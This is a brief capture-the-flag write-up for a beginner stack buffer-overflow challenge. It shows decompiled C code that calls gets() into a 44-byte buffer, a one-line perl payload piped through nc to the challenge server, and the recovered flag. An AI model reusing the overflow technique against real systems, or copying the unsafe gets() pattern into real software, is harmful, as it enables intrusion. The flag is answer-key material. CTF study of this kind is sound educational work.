Tags: bof pwn
Rating:
I really want to have some coffee!
nc chall.csivit.com 30001
Decompile with Ghidra. main() is very simple:
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
gets(local_38);
puts("\nThanks!\n");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
}
return 0;
}
This is the "hello world" of buffer overflows. It accepts input via gets() into a local_38 buffer that holds 44 chars, and immediately after that on the stack is local_c which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input.
kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:
Thanks!
Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
